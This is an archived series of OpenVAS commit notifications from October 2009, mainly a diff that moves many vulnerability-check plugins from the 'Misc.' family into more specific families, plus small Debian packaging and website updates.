trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_linux_900037.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -70,7 +70,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_linux_900037.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_win_900036.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -62,7 +62,7 @@ script_summary("Check for the version of Python"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -94,7 +94,7 @@ script_summary("Check for the version of Seamonkey"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_seamonkey_detect_win.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -72,7 +72,7 @@ script_summary("Check for the version of Seamonkey"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_seamonkey_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the Version of Streamripper"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the Version of Sun Java Web Start"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -69,7 +69,7 @@ script_summary("Check for the version of Thunderbird"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_thunderbird_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -65,7 +65,7 @@ script_summary("Check for the Version of TikiWiki CMS/Groupware"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Web application abuses"); script_require_ports("Services/www", 80); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -82,7 +82,7 @@ script_summary("Check for the version of VMware Products"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); script_dependencies("gb_vmware_prdts_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -79,7 +79,7 @@ script_summary("Check for the version of VMware Products"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); script_dependencies("gb_vmware_prdts_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -68,7 +68,7 @@ script_summary("Check for the Version of W3C Amaya Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); exit(0); } Modified: trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl =================================================================== --- trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -44,7 +44,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 8000); Modified: trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl =================================================================== --- trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -46,7 +46,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 8000); Modified: trunk/openvas-plugins/scripts/ident_process_owner.nasl =================================================================== --- trunk/openvas-plugins/scripts/ident_process_owner.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/ident_process_owner.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -23,7 +23,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 Michel Arboi"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("find_service1.nasl", "slident.nasl"); script_require_ports("Services/auth", 113); Modified: trunk/openvas-plugins/scripts/imss_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/imss_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/imss_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("httpver.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/iss_deploymanager.nasl =================================================================== --- trunk/openvas-plugins/scripts/iss_deploymanager.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/iss_deploymanager.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -40,7 +40,7 @@ script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright("This script is Copyright (C) 2000 SecuriTeam"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("find_service.nes"); script_require_ports("Services/lcdproc", 13666); Modified: trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl =================================================================== --- trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Peer-To-Peer File Sharing"; script_family(family); script_dependencie("http_version.nasl", "os_fingerprint.nasl"); script_require_ports(6346); Modified: trunk/openvas-plugins/scripts/nortel_default_username_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/nortel_default_username_password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/nortel_default_username_password.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -27,7 +27,7 @@ script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Privilege escalation"); script_copyright("This script is Copyright (C) 2004 Noam Rathaus"); Modified: trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl =================================================================== --- trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -29,7 +29,7 @@ script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2002 Rui Bernardino"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_require_ports(23); Modified: trunk/openvas-plugins/scripts/notesinicheck.nasl =================================================================== --- trunk/openvas-plugins/scripts/notesinicheck.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/notesinicheck.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -19,7 +19,7 @@ script_summary(summary); script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2004 Net-Square Solutions Pvt Ltd."); - family = "Misc."; + family = "Web application abuses"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl =================================================================== --- trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl =================================================================== --- trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -28,7 +28,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 George A. Theall"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "global_settings.nasl"); Modified: trunk/openvas-plugins/scripts/qpopper2.nasl =================================================================== --- trunk/openvas-plugins/scripts/qpopper2.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/qpopper2.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -39,7 +39,7 @@ script_copyright("This script is Copyright (C) 2002 Thomas Reinke"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -29,7 +29,7 @@ script_copyright("Copyright 2008 SecPod"); script_version("Revision: 1.2 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("Apple Safari for Windows Multiple Vulnerabilities July-08"); script_summary("Check for Apple Safari version"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Blue Coat K9 Web Protection Multiple Buffer Overflow Vulnerabilities"); script_summary("Check for vulnerable version and prior of Blue Coat"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.0 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Remote file access"); script_name("Visagesoft eXPert PDF Viewer ActiveX Control File Overwrite Vulnerability"); script_summary("Check for vulnerable version of eXPert PDF Viewer ActiveX"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Brute force attacks"); script_name("McAfee Encrypted USB Manager Remote Security Bypass Vulnerability"); script_summary("Check for the version of McAfee Encrypted USB Manager"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -29,7 +29,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.1 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("NuMedia Soft DVD Burning SDK Activex Control Remote Code Execution Vulnerability"); script_summary("Check for vulnerable version of CDBurnerXP"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Python Multiple Vulnerabilities (Win)"); script_summary("Check for vulnerable version of Pyhton"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Privilege escalation"); script_name("Trend Micro Web Management Authentication Bypass Vulnerability"); script_summary("Check for the version of Trend Micro OfficeScan"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.0 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Trend Micro OfficeScan CGI Parsing Buffer Overflow Vulnerability"); script_summary("Check for vulnerable version of Trend Micro OfficeScan"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.4 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("Wireshark Multiple Vulnerabilities - July08 (Linux)"); script_summary("Check for vulnerable version of Wireshark/Ethereal"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.2 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("xine-lib Multiple Vulnerabilities"); script_summary("Check for vulnerable version of xine-lib"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -29,7 +29,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.3 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("xine-lib Multiple Vulnerabilities (Aug-08)"); script_summary("Check for vulnerable version of xine-lib"); desc = " Modified: trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 Audun Larsen"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/websense_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/websense_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/websense_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("httpver.nasl"); Modified: trunk/openvas-plugins/scripts/webshield_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/webshield_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/webshield_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/zyxel_pwd.nasl =================================================================== --- trunk/openvas-plugins/scripts/zyxel_pwd.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/zyxel_pwd.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -38,7 +38,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2001 Giovanni Fiaschi"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); From scm-commit at wald.intevation.org Mon Oct 5 14:47:13 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 14:47:13 +0200 (CEST) Subject: [Openvas-commits] r5373 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091005124713.5875B85C72FF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-05 14:47:12 +0200 (Mon, 05 Oct 2009) New Revision: 5373 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install Log: * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-05 12:47:12 UTC (rev 5373) 
@@ -1,3 +1,9 @@ +openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low + + * Make sure the C based NVTs (CNVTs) are actually installed. + + -- Michael Wiegand Mon, 05 Oct 2009 14:42:51 +0200 + openvas-scanner (3.0.0.beta2-1) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs 2009-10-05 12:47:12 UTC (rev 5373) @@ -7,6 +7,7 @@ var/lib/openvas var/lib/openvas/CA var/lib/openvas/private/CA +var/lib/openvas/plugins var/log/openvas var/cache/openvas etc/openvas Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 12:47:12 UTC (rev 5373) @@ -5,4 +5,5 @@ usr/share/man/man1/openvas-mkrand.1 usr/share/man/man8/* var/lib/openvas/openvas-services +var/lib/openvas/plugins etc/openvas/openvassd.conf From scm-commit at wald.intevation.org Mon Oct 5 15:29:51 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 15:29:51 +0200 (CEST) Subject: [Openvas-commits] r5374 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091005132951.7FD22852FD79@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-05 15:29:49 +0200 (Mon, 05 Oct 2009) New Revision: 5374 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install Log: Correct the install entry to list files, not the directory. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 12:47:12 UTC (rev 5373) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 13:29:49 UTC (rev 5374) @@ -5,5 +5,5 @@ usr/share/man/man1/openvas-mkrand.1 usr/share/man/man8/* var/lib/openvas/openvas-services -var/lib/openvas/plugins +var/lib/openvas/plugins/* etc/openvas/openvassd.conf From scm-commit at wald.intevation.org Mon Oct 5 15:53:33 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 15:53:33 +0200 (CEST) Subject: [Openvas-commits] r5375 - trunk/doc/website Message-ID: <20091005135333.AAAAD852B6CC@pyrosoma.intevation.org> Author: jan Date: 2009-10-05 15:53:32 +0200 (Mon, 05 Oct 2009) New Revision: 5375 Modified: trunk/doc/website/openvas-server.htm4 trunk/doc/website/template_header.m4 Log: Updating website with some hints/consideration of the 3.0 Beta. Modified: trunk/doc/website/openvas-server.htm4 =================================================================== --- trunk/doc/website/openvas-server.htm4 2009-10-05 13:29:49 UTC (rev 5374) +++ trunk/doc/website/openvas-server.htm4 2009-10-05 13:53:32 UTC (rev 5375) 
@@ -6,10 +6,10 @@ m4_dnl Description: Overview on OpenVAS-Server Software m4_dnl m4_dnl Authors: -m4_dnl Jan-Oliver Wagner +m4_dnl Jan-Oliver Wagner m4_dnl m4_dnl Copyright: -m4_dnl Copyright (C) 2007, 2008 Intevation GmbH +m4_dnl Copyright (C) 2007, 2008, 2009 Greenbone Networks GmbH m4_dnl m4_dnl This program is free software; you can redistribute it and/or modify m4_dnl it under the terms of the GNU General Public License version 2, @@ -39,11 +39,18 @@

-The server consists of 4 modules: openvas-libraries, openvas-libnasl, openvas-server +Release 2.0: The server consists of 4 modules: openvas-libraries, openvas-libnasl, openvas-server and openvas-plugins. All need to be installed for a fully functional server.

